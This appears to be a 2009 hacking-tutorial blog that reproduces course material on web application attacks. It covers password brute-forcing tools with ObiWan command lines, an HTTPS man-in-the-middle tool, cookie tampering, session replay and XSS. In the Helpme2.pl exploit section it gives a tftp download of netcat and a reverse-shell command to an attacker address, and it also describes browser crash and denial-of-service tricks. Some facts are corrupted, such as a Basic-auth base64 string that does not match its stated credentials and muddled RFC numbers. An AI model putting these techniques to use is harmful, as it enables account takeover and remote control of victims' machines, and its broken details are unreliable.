Email Login| Link Exchange | Cyber News | Phishing Attack | SQL Injection | SEO | DOS Attack | Hacking Tools | |Hacking Tricks | Penetration Testing | Trojans & Keyloggers |Hacking Videos | General Discussion | Website Hacking | Session Hijacking | Social Engineering | Anonymous Surfing | Recover Passwords | Bypass Firewall | Hacking Books | Network Sniffers | Password Cracking | Enumerating & Fingerprinting | Movies & Songs

Share This Post With Your Friends

Friday, November 13, 2009

Password Guessing

  • Password guessing attacks can be carried out manually or via automated tools.
  • Password guessing can be performed against all types of Web Authentication

The common passwords used are:
root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]
Passwords are the principal means of authenticating users on the Web today. It is imperative that any Web site guard the passwords of its users carefully. This is especially important since users, when faced with many Web sites requiring passwords; tend to reuse passwords across sites. Compromise of a password completely compromises a user.

Attack Methods
Often Web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through the dictionary attack'. In a dictionary attack, the attacker takes a dictionary of words and names, and tries each one to see if it is the require password. This can be automated with programs which can guess hundreds or thousands of words per second. This makes it easy for attackers to try variations: word backwards, different capitalization, adding a digit to the end, and popular passwords.

Another well-known form of attack is the hybrid attack. A hybrid attack will add numbers or symbols to the filename to successfully crack a password. Often people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month password is "site"; second month password is "site2"; third month password is "site2"; and so on. A brute force attack is the most comprehensive form of attack, though it may often take a long time to work depending on the complexity of the password. Some brute force attacks can take a week depending on the complexity of the password.

Hacking Tool: WebCracker
  • WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.
  • lt keys on "HTTP 302 Object Moved" response to indicate successful guess.
  • lt will find all successful guesses given in a username/password.
Webcracker allows the user to test a restricted-access website by testing id and password combinations on the web site.This program exploits a rather large hole in web site authentication methods. Password protected websites may be easily brute-force hacked, if there is no set limit on the number of times an incorrect password or User ID can be tried.WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.
  • It keys on "HTTP 302 Object Moved" response to indicate successful guess.
  • It will find all successful username/password given in the list.
Hacking Tool: Brutus

http://www.hoobie.net/brutus/
  • Brutus is a generic password guessing tool that cracks various authentication.
  • Brutus can perform both dictionary attacks and brute-force attacks where passwords are randomly generated from a given character.
  • Brutus can crack the following authentication types:
  • HTTP (Basic authentication, HTML Form/CGI); POP3; FTP; SMB; Telnet

Brutus is an online or remote password cracker. More specifically it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of a supported target system might be an FTP server, a password protected web page, a router console a POP3 server etc. It is used primarily in two ways:
  • To obtain the valid access tokens for a particular user on a particular target.
  • To obtain any valid access tokens on a particular target where only target penetration is required.
Brutus does very weak target verification before starting; in fact all it does is connect to the target on the specified port. In the context of Brutus, the target usually provides a service that allows a remote client to authenticate against the target using client supplied credentials. The user can define the form structure to Brutus of any given HTML form. This will include the various form fields, any cookies to be submitted in requests, the HTTP referrer field to send (if any) and of course the authentication response strings that Brutus uses to determine the outcome of an authentication attempt.

If Brutus can successfully read forms of the fetched HTML page then each form will be interpreted and the relevant fields for each form will be displayed. Any cookies received during the request will also be logged here. Brutus handles each authentication attempt as a series of stages, as each stage is completed the authentication attempt is progressed until either a positive or negative authentication result is returned at which point Brutus can either disconnect and retry or loop back to some stage within the authentication sequence.

Hacking Tool: ObiWan

http://www.phenoelit.de/obiwan/docu.html
  • ObiWan is a powerful Web password cracking tool. It can work through a proxy.
  • ObiWan uses wordlists and alternations of numeric or alpha-numeric characters as possible as passwords.
  • Since Webservers allow unlimited requests it is a question of time and bandwidth to break into a server system.
ObiWaN stands for "Operation burning insecure Web server against Netscape". It is called Project 2086 now, after 2068 the number of the RFC which describes the HTTP/1.1 protocol. 11.1 is the section which describes the basic authentication scheme. This is the mostly used authentication scheme for web server and used by ObiWaN.

Web servers with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it. This allows the attacker to prod the system as long as he wants to.
Like other programs for UNIX system passwords (crack) or NT passwords (lophtcrack) ObiWaN uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords. Since web servers allow unlimited requests it is a question of time and bandwidth to break in a server system. The first way is to run ObiWaN more than once. The following example tries to crack username eccouncil on the intranet.
./ObiWaN -h intranet -a eccouncil -w list.txt 
To run it with alphanumeric variation with a depth of 2
./ObiWaN -h intranet -a eccouncil -w list.txt -A 2 
To run it in brute force loop mode
./ObiWaN -h intranet -a eccouncil -w list.txt -b 6 -B 8 
Hacking Tool: Munga Bunga

Munga Bunga's HTTP Brute Forcer is a utility utilizing the HTTP protocol to brute force into any login mechanism/system that requires a username and password, on a web page (or HTML form). To recap - A password usually only contains letters. In such a case the quantity of characters in a charset is 26 or 52, depending on usage of registers - both of them or just one. Some systems (Windows, for example) don't make any difference between lower-case and uppercase letters. With an 8-characters' long password the difference would amount to 256 times, which is really significant.

Brute force method can sometimes be very effective when it is combined with the functionality of the program. Munga Bunga is a tool which can be used for breaking into emails, affiliate programs, web sites, any web based accounts, launching DoS attacks, flooding emails, flooding forms, flooding databases and much more; though DoS attacks and flooding activity are not supported or documented in the documentation. Apart from this, the attacker can write definition files. These are files ending in the .def extension, and contain information about a particular server, and the data to submit to it. They are used to extend the power and capability of the program, based on the user's own definitions. The software comes bundled with some definition

The tool claims to be capable of brute forcing, any thing that can be entered via a HTML form with a password and username. The attack methodology goes as follows: The attacker uses a password file in order for the program to attempt and enter the account(s), with the specified passwords. In addition, he can write a definition file for the form he wants to crack into.

Hacking Tool: PassList

Passlist is another character based password generator.
Passlist is a character based password generator that implements a small routine which automates the task of creating a "passlist.txt" file for any brute force tool. The program does not require much information to work. The tool allows the user to specify the generation of passwords based on any given parameter. For instance, if the user knows that the target system's password starts with a particular phrase or number, he can specify this. This makes the list more meaningful to the user and easier for the brute forcer. He can also specify the length required such as the maximum number of random characters per password, apart from the maximum number of random

A partial list is given below.
  • Refiner is used to generate a wordlist containing all possible combinations of a partial password, which an attacker may have obtained by other means. Refiner will then generate a text file containing all possible combinations.
  • WeirdWordz allows the user to just select an input file and as an output file, makes all sorts of combinations of the lines/words in the input file.
  • Raptor 1.4.6 - creates words using many different filters from html files to create a wordlist.
  • PASS-PARSE V1.2 - Pass-parse will take any file and turn all the words into a standard type password list, while stripping anything that's not alphanumeric. The main idea behind it is that while trying to crack the password of a personal website, the password may appear on the site when the person describes their interests. This will parse through an html file and create a list of words from that page to try as passwords.

Web Based Password Cracking Techniques

Passport authentication messages are passed in the form of electronic "tickets" that are used to inform the site that the user has signed in successfully. A ticket is a small amount of data that indicates the time the sign in occurred, when the user last manually signed in, and other information that is useful to the authentication process. Within the Passport system, these tickets take the form of cookies.

To obtain a ticket, a user with a Passport account signs in to the site or tries to access a protected Web page within the merchant site (e.g., a page that requires user authentication before allowing access). This redirects the user to a special page on Passport.com. This page takes information that the merchant site has appended to the URL and processes it. This allows the Passport service to know which merchant site has referred the user, and which merchant site to return the user to. Once the information has been processed, Passport redirects the user to a page on Passport.net.

Once the user enters their credentials, they are sent back to the Passport.com domain. Once there and verified, Passport writes a cookie on the user's browser that stores information about this sign in. This is called a "ticket-granting-cookie" and it is used in subsequent sign in attempts. Then Passport redirects them back to your site.

When the user arrives back at the merchant site, they bring two encrypted packets of information attached to the query string. Software called the Passport Manager which is installed on the merchant's authenticating servers reads those packets and writes them as encrypted cookies in the merchant site domain.

The first cookie contains the authentication ticket information. The second contains any profile information that the user has chosen to share, and any operational information and unique identifiers that need to be passed. These packets are encrypted with a unique secret key that is shared between Passport and the merchant site. This helps to ensure that only the merchant can decode these messages.

The merchant site then takes this information and uses it to issue his cookies. Since these cookies are issued from the merchant domain, the merchant will have access to them. The merchant can use the Passport User ID to look a user up in the merchant database and perform authorization tasks.

When the user navigates to another Passport participating site, the new site has several choices to make about how they will authenticate this user. When the user clicks the sign in button, they are directed to the Passport service exactly as they were at their first sign in. The difference is that this time there is a ticket-granting-cookie saved on the browser that Passport can read.

Since the ticket contains the time that it was issued, it allows the referring site to decide how "fresh" the cookie needs to be in order for the site to accept it. If the ticket meets the rules the referring site has chosen, the user is redirected back to the referring site along with the encrypted ticket and profile cookies. If the ticket is too old, the user is prompted to re-enter their credentials.

Note

However, passport has been plagued with security issues - right from reuse of authentication cache to privacy flouting activities. Apart from this exploits that plague Microsoft based web systems such as Unicode exploits, cross site scripting and cookie stealing cast more than a shadow of doubt on this means of authentication.

A few links exploring these issues are given below:

Forms-Based Authentication
  • It is highly customizable authentication mechanism that uses a form composed of HTML with

  • After the data input via HTTP or SSL, it is evaluated by some server-side logic and if the credentials are valid, then a cookie is given to the client to be reused on subsequent visits.

  • Forms based authentication technique is the popular authentication technique on the internet.

Conventionally, web applications had users authenticate themselves through a Web form. The user's credentials as captured by this form are submitted to the business logic which determines the authorization level. If the user is authenticated, the application generates a cookie or session variable. This cookie contains anything from a valid session identification access token to customized personalization values. The time period for which the cookie is valid or the contents stored in it are subject to security risks.

Forms Authentication is a system in which unauthenticated requests are redirected to a web form where the unauthenticated users are required to provide their credentials. In the context of ASP.NET, it extends similar logic into its architecture as an authentication facility, Forms Authentication. Forms Authentication is one of three authentication providers. Windows Authentication and Passport Authentication make up the other two providers.

Reverting back to the web based authentication method, on being properly verified by the application, based on the credentials input by the user, an authorization ticket is issued by the Web application in the form of a cookie. In essence, Forms Authentication is a means for wrapping the web application around the login user interface and verification processes.

Note

Forms Authentication Flow

  • A client generates a request for a protected resource (e.g. a transaction details page).

  • IIS (Internet Information Server) receives the request. If the requesting client is authenticated by IIS, the user/client is passed on to the web application. However, if Anonymous Access is enabled, the client will be passed onto the web application by default. Otherwise, Windows will prompt the user for credentials to access the server's resources.

  • If the client doesn't contain a valid authentication ticket/cookie, the web application will redirect the user to the URL where the user is prompted to enter their credentials to gain access to the secure resource.

  • On providing the required credentials, the user is authenticated / processed by the web application. The web application also determines the authorization level of the request, and, if the client is authorized to access the secure resource, an authentication ticket is finally distributed to the client. If authentication fails, the client is usually returned an Access Denied message.




Hacking Tool: WinSSLMiM
  • http://www.securiteinfo.com/outils/WinSSLMiM.shtml

  • WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates.

  • It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.

  • Usage:

    • FakeCert: fc -h

    • WinSSLMiM: wsm -h

We have seen how digital certificates are used for authentication purposes. Typically, the administrator of a web site opts to provide secure communication through the SSL. To enable this, the administrator generates a certificate and gets it signed by a Certification Authority. The generated certificate will list the URL of the secure web site in the Common Name (CN) field of the Distinguished Name section. The CA verifies that the administrator legitimately owns the URL in the CN field, signs the certificate, and gives it back.

[CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.website.com]

Note

When a web browser receives the certificate, it should verify that the CN field matches the domain it just connected to, and that it is signed by a known CA certificate. No man in the middle attack is possible because it should not be possible to substitute a certificate with a valid CN and a valid signature. However, it is possible that the signing authority has been delegated to more localized authorities. In this case, the administrator of www.website.com will get a chain of certificates from the localized authority:


Attack Methods

However, as far as IE is concerned, anyone with a valid CA-signed certificate for any domain can generate a valid CA-signed certificate for any other domain. If an attacker wants to, he can generate a valid certificate and request a signature from VeriSign:

[CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com]

Then he can generate a certificate for any domain he wants to, and sign it using his CA-signed certificate: [CERT - Issuer: VeriSign / Subject: VeriSign]

-> [CERT - Issuer: VeriSign / Subject: www.attacker.com] -> [CERT - Issuer: www.attacker.com / Subject: ]

Since IE does not check the Basic Constraints on the www.attacker.com certificate, it accepts this certificate chain as valid for . This means that anyone with any CA-signed certificate (and the corresponding private key) can spoof anyone else. Any of the standard connection hijacking techniques can be combined with this vulnerability to produce a successful man in the middle attack.

Tools

WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates. It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.



---Regards,
Amarjit Singh

What is Cookie ?

Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remembering HTTP is stateless, this may simply be between requests for documents in a same session or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying show this to me next time you come in. Cookies cannot be shared (read or written) across DNS domains.

In correct client operation Domain A can't read Domain B's cookies, but there have been much vulnerability in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add this information to the client's cookies file or store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.

flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.

path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as/reference/web protocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.

secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.

expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.

name: The name of the variable (in this case Apache).

The limit on the size of each cookie (name and value combined) is 4 kb. A maximum of 20 cookies per server or domain is allowed.

Cookies are the preferred method to maintain state in HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.

The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.

Example from a real world example

Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;

The attacker can simply modify the cookie to;

Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;

Hacking Tool: Helpme2.pl
  • Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability.

  • This tool generates an HTML file with a given hidden command.

  • When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is an exploit code written to take advantage of the winhelp32.exe vulnerability. The perl script takes a command to execute (WinExec, SW_HIDE) and gives an html output file. There are two versions

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778

The exploit does the following:

  1. Executes tftp.exe-i attacker.ip.address get nc.exe c: \winnt\system32\nc.exe

  2. Executes nc.exe attacker.ip.address 80-e cmd.exe

This code generates an HTML file with a given hidden command. When the HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Hacking Tool: WindowBomb


An email sent with such html files attached will create pop-up windows until the PC's memory gets exhausted.

Window bombs are code written to cause annoying behavior on the user's computer screen. These can be such as the ones seen include:

Deadly image

A. GIF which crashes the browser on clicking.

Uncloseable window

Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.

Invincible alert dialogue

Executes a function which generates an alert dialogue and then runs the function again

Reload-o-rama

Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.

Window spawner

Continuously opens new windows until the ram or swap space is full.

Jiggy window

Causes the window to dance around on the screen so fast that the controls cannot be reached.

Jiggy window spawner

Creates and endless stream of little dancing windows.

While loop processor hog

executes an endless loop to chew up some processor time

Recursive frames

Opens a set of recursive frames until the ram or swap space is full.

Memory bomb

Dynamically allocates ram to the browser until the ram or swap space is full.

Super memory bomb

Opens a 100K document with numerous recursive tables and ordered lists.

Hacking Tool: IEEN

http://www.securityfriday.com/ToolDownload/IEen

  • IEEN remotely controls Internet Explorer using DCOM.

  • If you knew the account name and the password of a remote machine, you can remotely control the software component on it using DCOM. For example Internet Explorer is one of the soft wares that can be controlled.

IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without noticed by the users.

However, if an attacker knew the account name and the password of a remote machine, he can remotely control the software component on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.

Summary of IE'en Functionalities:

  • Remotely connects to or activates Internet Explorer

  • Captures data sent and received using Internet Explorer

  • Even on SSL encrypted websites (e.g. Hotmail); IE'en can capture user ID and password in plain text.

  • Change the web page on the remote IE window.

  • Make the remote IE window visible / invisible

---------------------------------------------------------------------------------------------

Summary
  • Attacking web applications is the easiest way to compromise hosts, networks and users.

  • Generally nobody notices web application penetration, until serious damage has been done.

  • Web application vulnerability can be eliminated to a great extent ensuring proper design specifications and coding practices as well as implementing common security procedures.

  • Various tools help the attacker to view the source codes and scan for security holes.

  • The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / "secure" cookies are advocated instead of using hidden fields, which are easily manipulated by attackers.

  • A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.

  • If the application accepts only expected input, then the XSS can be significantly reduced.

---Regards,
Amarjit Singh

Authentication And Session Management

  • Brute/Reverse Force

  • Session Hijacking

  • Session Replay

  • Session Forgoing

  • Page Sequencing

Attack Methods

Brute Force

Brute Forcing involves performing an exhaustive key search of a web application authentication token's key space in order to find a legitimate token that can be used to gain access.

According to rfc2617, the Basic Access Authentication scheme of HTTP is not considered to be a secure method of user authentication (unless used in conjunction with some external secure system such as SSL), as the user name and password are passed over the network as cleartext. To receive authorization, the client sends the userid and password, separated by a single colon (":") character, within a base64 encoded string in the credentials.

user-pass

=

userid ":" password

userid

=

*

password

=

*TEXT

For instance, if the user agent wishes to send the userid "Winnie" and password "the pooh", it would use the following header field:

Authorization: Basic bjplc2vcGZQQWxRpVuIHhZGNFt== 

Therefore, it is relatively easy to brute force a protected page if an attacker uses decent dictionary lists. For the page http://www.victim.com/private/index.html, an attacker can generate base 64 encoded strings with commonly used usernames and a password, generate HTTP requests, and look for a non-404 response:

Attack Methods

Session Replay

If a user's authentication tokens are captured or intercepted by an attacker, the session can be replayed by the attacker, making the concerned web application vulnerable to a replay attack. In a replay attack, an attacker openly uses the captured or intercepted authentication tokens such as a cookie to create or obtain service from the victim's account; thereby bypassing normal user authentication methods.

A simple example is sniffing a URL with a session ID string and pasting it back into the attacker's web browser. The legitimate user may not necessarily need to be logged into the application at the time of the replay attack. While it is generally that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that these generated authentication tokens are also just as sensitive. Many users who may have extremely hard-to-guess passwords are careless with the protection of cookies and session information that can be just as easily used to access their accounts in a replay attack. This is often considered forging "entity authentication" since most applications check the tokens stored in the browser or HTTP stream, and do not require user authentication after each web request.

By simply sniffing the HTTP request of an active session or capturing a desktop user's cookie files, a replay attack can be very easily performed. Exploitation can take the following general forms:

  • Visiting a pre-existing dynamically created URL that is assigned to a specific user's account which has been sniffed or captured from a proxy server log

  • Visiting a specific URL with a preloaded authentication token (cookie, HTTP header value, etc.) captured from a legitimate user

  • A combination of 1 and 2.

Session tokens that do not expire on the HTTP server can allow an attacker unlimited time to guess or brute force a valid authenticated session token. An example is the "Remember Me" option on many retail websites. If a user's cookie file is captured or brute-forced, then an attacker can use these static-session tokens to gain access to that user's web accounts. Additionally, session tokens can be potentially logged and cached in proxy servers that, if broken into by an attacker, may contain similar sorts of information in logs that can be exploited if the particular session has not been expired on the HTTP server. To prevent Session Hijacking and Brute Force attacks from occurring to an active session, the HTTP server can seamlessly expire and regenerate tokens to give an attacker a smaller window of time for replay exploitation of each legitimate token. Token expiration can be performed based on number of requests or time.

Attack Methods

Session Forging/Brute-Forcing Detection and/or Lockout

Many websites have prohibitions against unrestrained password guessing (e.g., it can temporarily lock the account or stop listening to the IP address). With regard to session token brute-force attacks, an attacker can probably try hundreds or thousands of session tokens embedded in a legitimate URL or cookie for example without a single complaint from the HTTP server. Many intrusion-detection systems do look for this type of attack; penetration tests also often overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session tokens that never actually get assigned but will detect if an attacker is trying to brute force a range of tokens. Anomaly/misuse detection hooks can also be built in to detect if an authenticated user tries to manipulate their token to gain elevated privileges.

Attack Methods

Session Re-Authentication

Critical user actions such as money transfer or significant purchase decisions should require the user to re-authenticate or be reissued another session token immediately prior to significant actions. Developers can also somewhat segment data and user actions to the extent where reauthentication is required upon crossing certain "boundaries" to prevent some types of cross-site scripting attacks that exploit user accounts.

Attack Methods

Session Token Transmission

If a session token is captured in transit through network interception, a web application account is then prone to a replay or hijacking attack. Typical web encryption technologies include but are not limited to Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1) protocols in order to safeguard the state mechanism token.

Attack Methods

Session Tokens on Logout

With the popularity of Internet Kiosks and shared computing environments on the rise, session tokens take on a new risk. A browser only destroys session cookies when the browser thread is torn down. Most Internet kiosks maintain the same browser thread. It is recommended to overwrite session cookies when the user logs out of the application.

Attack Methods

Page Sequencing

Page sequencing is the term given to the vulnerability that arises as a result of poor session management, thereby allowing the user to take an out of turn action and bypass the defined sequence of web pages. This can be something like moving ahead to a later stage of a financial transaction. This arises due to faulty session/application state management.


Traditional XSS Web Application Hijack Scenario - Cookie stealing
  • User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application.

  • The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. guest book, banner, etc,) and make it load automatically without requiring user intervention.

Attack Methods

It is a fact that most web sites address security using SSL for authenticating their login sessions. Let us see how this process takes place. When the client connects to a web site two events take place to ensure security.

  1. The web site must prove that it is the web site it claims to be.

The web site authenticates itself by the SSL certificate issued to the domain in question by a trusted third party. Depending on the extent the user trusts the certificate issuer; s/he can be assured that the web site is what it claims to be.

Once the web site is authenticated by the user, he can choose to establish a secure data connection via the public key mechanism of SSL so that all the data that is transmitted between them is encrypted.

  1. The user must authenticate self to the web site

The user provides his username/password into a form and this data is transmitted in an encrypted fashion to the web site for authentication. If the client is authenticated, a session cookie is generated with appropriate timeout and validation information. This is sent back to the user as a "secure cookie" - i.e. one that is only passed back and forth over SSL.

This can be considered as passing a shared secret back and forth, which is encrypted and is not the actual password and does timeout. If the website does not use cookies, it can opt for session codes that are embedded in the site URLs so that they are never stored in the hard disk of the client computer. Some web sites do require their users to obtain client SSL certificates so that the web site can authenticate the clients via these certificates and thus not need this whole username/password scheme.

Cookies were originally introduced by Netscape and are now specified in RFC 2965 (which supersedes RFC 2109), with RFC 2964 and BCP44 offering guidance on best practice. Cookies were never designed to store usernames and passwords or any sensitive information. There are two categories of cookies, secure or non-secure and persistent or non-persistent, giving four individual cookies types.

  • Persistent and Secure

  • Persistent and Non-Secure

  • Non-Persistent and Secure

  • Non-Persistent and Non-Secure

---Regards,
Amarjit Singh

What is Cross Side Scripting (XSS)?

  • A Web application vulnerable to XSS allows a user to inadvertently send malicious data to self through that application.

  • Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.

  • These links cause client side scripting languages )VBScript, JavaScript etc,) of the attacker s choice to execute on the victim's browser.

  • XSS vulnerabilities are caused by a failure in the web application to properly validate user input.

The simplest description of cross-site scripting can be put as the attack that occurs when a user enters malicious data in a Web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. Unlike most security vulnerabilities, CSS doesn't apply to any single vendor's products - instead, it can affect any software that runs on a web server

CSS takes place as a result of the failure of the web based application to validate user supplied input, before returning it to the client system. "Cross-Site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute malicious code with the same permissions as the domain of the web application, an attacker can bypass the traditional document object model (DOM) security restrictions. The document object model is accessible application interface that allows client-side languages to dynamically access and modify the content, structure and style of a web page.

Cross-Site Scripting (CSS) attacks require the execution of Client-Side Languages (JavaScript, Java, VBScript, ActiveX, Flash, etc.) within a user's web environment. Cross Site Scripting can result in an attacker stealing cookies, hijacking sessions, changing of web application account settings etc. The most common web components that are vulnerable to CSS attacks include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Moreover, a victim does not necessarily have to click on a link to make the attack possible.

XSS Countermeasures
  • As a web application user, there are a few ways to protect yourselves from XSS attacks.

  • The first and the most effective solution is to disable all scripting language support in your browser and email reader.

  • If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages.

  • Proxy servers can help filter out malicious scripting in HTML.

    Preventing cross-site scripting is a challenging task especially for large distributed web applications. If the application accepts only expected input, then the XSS can be significantly reduced.

    Web servers should set the character set, and then make sure that the data they insert is free from byte sequences that are special in the specified encoding. This can typically be done by settings in the application server or web server. The server should define the character set in each html page as below.

     

    Web pages with unspecified character-encoding work mostly because most character sets assign the same characters to byte values below 128. Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as "<. These should be checked.

Input Manipulation : Web Application Vulnerabilities

  • URL Manipulation CGI Parameter Tampering

  • HTTP Client-Header Injection

  • Filter/Intrusion Detection Evasion

  • Protocol/Method Manipulation

  • Overflows

In the context of a web based attack (or web server attack), the attacker will first try to probe and manipulate the input fields to gain access into the web server. They can be broadly categorized as given below.

URL Manipulation CGI Parameter Tampering: This is perhaps the easiest of the lot. By inserting unacceptable or unexpected input in the url through the browser, the attacker tries to gauge whether the server is protected against common vulnerabilities.

HTTP Client-Header Injection: The next accessible point is the HTTP header. Using HTTP tags such as referrer, the attacker can manipulate the client side to suit his needs.

Filter/Intrusion Detection Evasion: The best part of attacking a web server is that the attacker can use the default port of entry - namely port 80 - to gain access into the network. As this is a standard port open for business needs, it is easy to evade intrusion detection systems or firewalls.

Protocol/Method Manipulation: Manipulating the particular protocol or the method used in the function, the attacker can hack into a web server.

Overflows: Some web server vulnerabilities take advantage of buffer overflows. The advantage is that by using buffer overflow techniques, the attacker can also make the server execute a code of his choice, making it easier for him to exploit the server further.

---Regards,
Amarjit Singh

Web Application Vulnerabilities

Readers, now we will learn to emphasize on the need to secure the applications as they permit an attacker to compromise a web server or network over the legitimate port of entry. As more businesses are hosting web based applications as a natural extension of themselves, the damage that can result as a result of compromise assumes significant proportions.

After completing this, you will be familiar with the following aspects:
  • Understanding Web Application Security

  • Common Web Application Security Vulnerabilities

  • Web Application Penetration Methodologies

  • Input Manipulation

  • Authentication And Session Management

  • Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth

  • Countermeasures


Understanding Web Application Security


Web based application security differs from the general discussion on security. In the general context, usually an IDS and/firewall lends some degree of security. However in the case of web applications, the session takes place through the allowed port - the default web server port 80. This is equivalent to establishing a connection without a firewall. Even if encryption is implemented, it only encrypts the transport protocol and in the event of an attack, the attacker's session will just be encrypted in nature. Encryption does not thwart the attack.

Attacking web applications is one of the most common way attackers compromise hosts, networks and users. It is a challenging task to defend against these attacks as there is no scope for logging the actions performed. This is particularly true for today's business applications where a significant percentage of applications are custom made or sourced from third party software components.

Common Web Application Vulnerabilities
  • Reliability of Client-Side Data

  • Special Characters that have not been escaped

  • HTML Output Character Filtering

  • Root accessibility of web applications

  • ActiveX/JavaScript Authentication

  • Lack of User Authentication before performing critical tasks.

It has been noted that more often web application vulnerability can be eliminated to a great extent by the way they are designed. Apart from this, common security procedures are often overlooked by the functioning of the application.

Threat

Reliability of Client-Side Data: It is recommended that the web application rely on server side data for critical operations rather than the client side data, especially for input purposes.

Threat

Special Characters that have not been escaped: Often this aspect is overlooked and special characters that can be used to modify the instructions by the attackers are found in the web application code. For example, UTF-7 provides alternative encoding for "<" and ">", and several popular browsers recognize these as the start and end of a tag.

Threat

HTML Output Character Filtering: Output filtering helps a developer build an application which is not susceptible to cross site scripting attacks. When information is displayed to users, it should be escaped. HTML should be rendered inactive to prevent cross site scripting attacks.

Threat

Root accessibility of web applications: Ideally web applications should not expose the root directory of the web server. Sometimes, it is possible for the user to access the root directory if he can manipulate the input or the URL.

Threat

ActiveX/JavaScript Authentication: Client side scripting languages are vulnerable to attacks such as cross side scripting.

Threat

Lack of User Authentication before performing critical tasks: An obvious security lapse, where restricted area access is given without proper authentication, reuse of authentication cache or poor logout procedures. These applications can be vulnerable to cookie based attacks.


Web Application Penetration Methodologies
  • Information Gathering and Discovery

    • Documenting Application / Site Map

    • Identifiable Characteristics / Fingerprinting

    • Signature Error and Response Codes

    • File / Application Enumeration

      • Forced Browsing

      • Hidden Files

      • Vulnerable CGIs

      • Sample Files

  • Input/Output Client-Side Data Manipulation

Penetrating web servers is no different from attacking other systems when it comes to the basic methodology. Here also, we begin with information gathering and discovery. This can be anything from searching for particular file types / banners on search engines like google. For examples, searching for "index/" may bring up unsuspecting directories on interesting sites where one may find information that can be used for penetrating the web server.

Hacking Tool: Instant Source

http://www.blazingtool.com

  • Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!

